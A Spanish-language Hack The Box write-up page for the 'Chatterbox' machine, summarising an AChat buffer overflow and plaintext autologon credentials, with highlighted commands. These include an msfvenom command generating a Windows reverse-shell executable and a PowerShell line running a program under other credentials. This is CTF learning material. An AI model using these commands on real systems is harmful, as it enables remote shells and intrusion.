xerosec
  • whoami
  • CTF Checklists
    • Enumeración inicial
    • Vectores de ataque
    • Escalada de privilegios
    • Active Directory
  • Writeups
    • YouTube - Walkthroughs en español
    • Hack The Box
      • Nibbles
      • Blocky
      • Irked
      • Traverxec
      • Cronos
      • Active
      • Devel
      • Chatterbox
      • Secnotes
    • TryHackMe
      • Hacking with Powershell
      • Enterprise
      • Chill Hack
      • Mr Robot CTF
      • Daily Bugle
      • Rootme
      • Attacktive Directory
      • Retro
  • Apuntes y recursos OSCP
    • Técnicas fundamentales
    • Linux
      • Linux Basics
      • Linux Privesc
    • Windows
      • Windows Basics
      • Windows Privesc
      • Ataques MITM
      • Enumeración Post-Explotación
      • Ataques Post-Explotación
  • Recursos
    • Plataformas de aprendizaje
Con tecnología de GitBook
En esta página
  • Resumen de la resolución
  • Habilidades adquiridas
  • Comandos y herramientas destacables
  • Walkthrough en YouTube:
  1. Writeups
  2. Hack The Box

Chatterbox

AnteriorDevelSiguienteSecnotes

Última actualización hace 1 año

Resumen de la resolución

  • Software AChat vulnerable a BOF expuesto en la máquina víctima

  • Credenciales de administrador almacenadas en texto plano debido a la función Autologon Passwords de Windows

Habilidades adquiridas

  • Además de usar impacket-psexec para conseguir una shell en la máquina víctima si se pueden subir archivos por SMB también se puede crear un binario malicioso con MSFVenom y subirlo a la máquina comprometida mediante otros métodos. Por ejemplo: levantando un servidor http en nuestra máquina de atacante y descargando el binario con certutil o wget.

Comandos y herramientas destacables

#Creación de binario malicioso
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > privesc.exe
#Ejecución de un programa como otro usuario en Powershell
powershell -c "$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('<USER>', $password);Start-Process -FilePath "<PROGRAM.EXE>" -Credential $creds"

Walkthrough en YouTube: